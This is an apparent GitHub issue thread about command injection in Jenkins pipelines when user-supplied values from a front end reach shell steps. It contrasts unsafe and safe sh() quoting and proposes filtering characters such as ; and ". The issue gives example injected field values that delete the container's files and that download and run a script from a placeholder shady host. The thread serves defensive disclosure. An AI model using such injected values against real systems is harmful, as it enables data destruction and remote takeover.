### ISSUE TITLE
Validate User Input to Activators

### ISSUE THREAD

**Issue by dangleft** [tranquilitybase-io/tb-houston-service#522]
Its possible that handing variables from EC to an Activator provides a route for attack via variable injection.  User input validation will prevent this.

I have written the module like this:
Jenkinsfile (Declarative Pipeline)
pipeline {
  agent any
  parameters {
    string(name: 'STATEMENT', defaultValue: 'hello; ls /', description: 'What should I say?')
  }
  stages {
    stage('Example') {
      steps {
        /* WRONG! */
        sh("echo ${STATEMENT}")
      }
    }
  }
}

When really it should be like this:
Jenkinsfile (Declarative Pipeline)
pipeline {
  agent any
  parameters {
    string(name: 'STATEMENT', defaultValue: 'hello; ls /', description: 'What should I say?')
  }
  stages {
    stage('Example') {
      steps {
        /* CORRECT */
        sh('echo ${STATEMENT}')
      }
    }
  }
}

I've used " in my sh() steps. Which means I'm using variable expansion on the bash command line of the docker image. So this is possible:

I (by default) supply the value for GCP_ACCOUNT in the menu in EC.
that translates to a command in a script like:

gcloud config set account "$GCP_ACCOUNT"

if I put the following line into the gcp account field:
dlrt@gftdevgcp.com"; rm-rf /

i delete everything off the docker image....

and if i did:
dlrt@gftdevgcp.com"; wget someshadyaddress.com/attack.py; ./attack.py;

I'd potentially get control of the docker container.... but not if EC discards the input

If EC does input validation and prevents characters like ; " [] the cmd injection is not possible.

**Describe alternatives you've considered**
I am also investigating how to do input validation in jenkins as well.

A secondary method to reduce the attack surface is to move the logic from init-* plan-* apply-* into the jenkins sh() steps directly and using the groovy template language as in the CORRECT example above.

**Comment by Salles-FA** [comment]
Hi @dangleft,

Which patterns should be prevented to store into the database? Is it any strings with `;`, `"`, `[` and `]` only?
